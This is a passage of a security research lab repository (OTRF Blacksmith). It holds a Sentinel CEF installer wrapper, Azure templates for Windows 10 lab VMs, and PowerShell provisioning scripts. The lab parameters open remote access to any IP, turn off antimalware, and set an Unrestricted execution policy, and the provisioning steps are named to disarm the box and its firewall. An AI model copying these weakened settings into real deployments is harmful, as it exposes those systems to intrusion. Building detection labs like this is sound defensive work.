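# environment (never set in this script, so they expand to empty strings).
# The message is passed as a printf argument instead of being spliced into the
# format string, so a '%' in the text cannot be misread as a conversion specifier.
echoerror() {
    printf '%s * ERROR%s: %s\n' "${RC}" "${EC}" "$*" 1>&2
}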
15 |
16 | # *********** helk function ***************
# Print the command-line help (the "Usage:" line goes to stderr, everything else to
# stdout, exactly as before) and exit with status 1.
usage() {
    printf '%s\n' " "
    printf 'Usage: %s [option...]\n' "$0" >&2
    printf '\n'
    printf '%s\n' " -w Azure Sentinel Workspace ID"
    printf '%s\n' " -k Azure Sentinel Workspace Key"
    printf '\n'
    printf '%s\n' "Examples:"
    printf ' %s -w xxxxx -k xxxxxx\n' "$0"
    printf '%s\n' " "
    exit 1
}
29 |
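# ************ Command Options **********************
# The leading ':' puts getopts in silent mode so this script's own messages are used
# (without it getopts prints its own error and the ':' branch below is never reached).
while getopts :w:k:h option
do
    case "${option}"
    in
        w) WORKSPACE_ID=$OPTARG;;
        k) WORKSPACE_KEY=$OPTARG;;
        h) usage;;
        \?) echo "$ERROR_TAG Unknown option: -$OPTARG" >&2; usage;;
        : ) echo "$ERROR_TAG Missing option argument for -$OPTARG" >&2; exit 1;;
        * ) echo "$ERROR_TAG Unimplemented option: -$OPTARG" >&2; exit 1;;
    esac
done

if ((OPTIND == 1))
then
    echo "$ERROR_TAG No options specified"
    usage
fi

# Both values are required: with only one of them the installer below would be started
# with the wrong number of positional arguments.
if [ -z "${WORKSPACE_ID}" ] || [ -z "${WORKSPACE_KEY}" ]
then
    echo "$ERROR_TAG Both -w (workspace ID) and -k (workspace key) are required" >&2
    usage
fi

######################
# SYSLOG SERVER SETUP
######################
# cef_installer.py is expected to already be present in the current directory; this
# script does not fetch it. The workspace key is passed as a command-line argument and
# is therefore visible in the process list and shell history on this host while the
# installer runs — keep that in mind when deciding how this script is invoked.
python cef_installer.py "$WORKSPACE_ID" "$WORKSPACE_KEY"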
--------------------------------------------------------------------------------
/templates/azure/Win10/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 Virtual Machine
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "numberOfWorkstations": {
12 | "value": 1
13 | },
14 | "vmNamePrefix": {
15 | "value": "WORKSTATION"
16 | },
17 | "vmNameSuffix": {
18 | "value": 5
19 | },
20 | "windowsDesktopSKU": {
21 | "value": "20h1-pro"
22 | },
23 | "windowsDesktopVersion": {
24 | "value": "latest"
25 | },
26 | "vmSize": {
27 | "value": "Standard_B2s"
28 | },
29 | "virtualNetworkName": {
30 | "value": "vnet-win"
31 | },
32 | "virtualNetworkAddressRange": {
33 | "value": "192.168.0.0/16"
34 | },
35 | "subnetRange": {
36 | "value": "192.168.2.0/24"
37 | },
38 | "subnetName": {
39 | "value": "snet-win"
40 | },
41 | "remoteAccessMode": {
42 | "value": "AllowPublicIP"
43 | },
44 | "allowedIPAddresses": {
45 | "value": "*"
46 | },
47 | "enableSysmon": {
48 | "value": false
49 | },
50 | "enableAntimalware": {
51 | "value": false
52 | },
53 | "_artifactsLocation": {
54 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
55 | },
56 | "_artifactsLocationSasToken": {
57 | "value": ""
58 | }
59 | }
60 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/demos/README.md:
--------------------------------------------------------------------------------
1 | # Demo Templates
2 |
3 | | Items | Deploy | Deploy US Gov |
4 | | :---| :---| :--- |
5 | | [Win 10 Fresh Install](https://github.com/OTRF/Blacksmith/blob/master/templates/azure/Win10/demos/Win10-FreshInstall.json) | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fdemos%2FWin10-FreshInstall.json) | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fdemos%2FWin10-FreshInstall.json) |
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the Windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2021-11-01",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/customScriptExtensionArray.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to run scripts on"
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array",
13 | "defaultValue": []
14 | },
15 | "commandToExecute": {
16 | "type": "string"
17 | },
18 | "location": {
19 | "type": "string",
20 | "metadata": {
21 | "description": "Location for all resources."
22 | }
23 | }
24 | },
25 | "resources": [
26 | {
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2021-07-01",
29 | "name": "[concat(parameters('virtualMachines')[copyIndex('CustomScriptCopy')].vmname, '/', parameters('virtualMachines')[copyIndex('CustomScriptCopy')].extensionName)]",
30 | "location": "[parameters('location')]",
31 | "copy": {
32 | "name": "CustomScriptCopy",
33 | "count": "[length(parameters('virtualMachines'))]"
34 | },
35 | "properties": {
36 | "publisher": "Microsoft.Compute",
37 | "type": "CustomScriptExtension",
38 | "typeHandlerVersion": "1.8",
39 | "autoUpgradeMinorVersion": true,
40 | "settings": {
41 | "fileUris": "[parameters('fileUris')]",
42 | "commandToExecute": "[parameters('commandToExecute')]"
43 | }
44 | }
45 | }
46 | ]
47 | }
48 |
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/sysmonInstall.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installSysmonScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installSysmonScript')]",
33 | "script": "Install-Sysmon.ps1",
34 | "function": "Install-Sysmon"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
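#Requires -Version 5
# Installs the pinned DSC modules that the DSC configurations of this template depend on.
# Intended to run elevated during VM provisioning, before any DSC configuration is applied.

# Fail on the first error: Install-PackageProvider/Install-Module errors are non-terminating
# by default, so a failed download would otherwise let provisioning continue and fail later,
# inside DSC, with a far less obvious message.
$ErrorActionPreference = 'Stop'

# NOTE(review): Unrestricted removes script-signature checks for every script run on this box
# afterwards. It is left as-is because the follow-up provisioning scripts are presumably
# unsigned; confirm that before tightening it to RemoteSigned.
Set-ExecutionPolicy Unrestricted -Force

# PSGallery only accepts TLS 1.2; older .NET defaults would otherwise fail the download.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# NuGet provider is required by Install-Module; trusting PSGallery avoids the interactive
# "untrusted repository" prompt during unattended provisioning.
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

# Versions are pinned so the DSC configurations resolve exactly the module they were written against.
Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0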
--------------------------------------------------------------------------------
/templates/azure/Win10/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
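# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Runs the post-deployment configuration steps for this box, in order. Each step is a
# sibling script resolved against $PSScriptRoot (the directory this file lives in), so the
# sequence no longer depends on the caller's working directory. A failing step does not
# abort the sequence; that matches the previous behaviour.

$here = $PSScriptRoot

# Install DSC Modules
& (Join-Path $here 'Install-DSC-Modules.ps1')

# Custom Settings applied
& (Join-Path $here 'Prepare-Box.ps1')

# Additional configs
& (Join-Path $here 'Disarm-Box.ps1')

# Additional Firewall rules
& (Join-Path $here 'Disarm-Firewall.ps1')

# Enable PSRemoting
& (Join-Path $here 'Configure-PSRemoting.ps1')

# Set Windows Audit Policies
& (Join-Path $here 'Enable-WinAuditCategories.ps1')

# PowerShell Logging
& (Join-Path $here 'Enable-PowerShell-Logging.ps1')

# Set Audit Rules from Set-AuditRule project
& (Join-Path $here 'Set-SACLs.ps1')

# Set Wallpaper
& (Join-Path $here 'Set-WallPaper.ps1')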
--------------------------------------------------------------------------------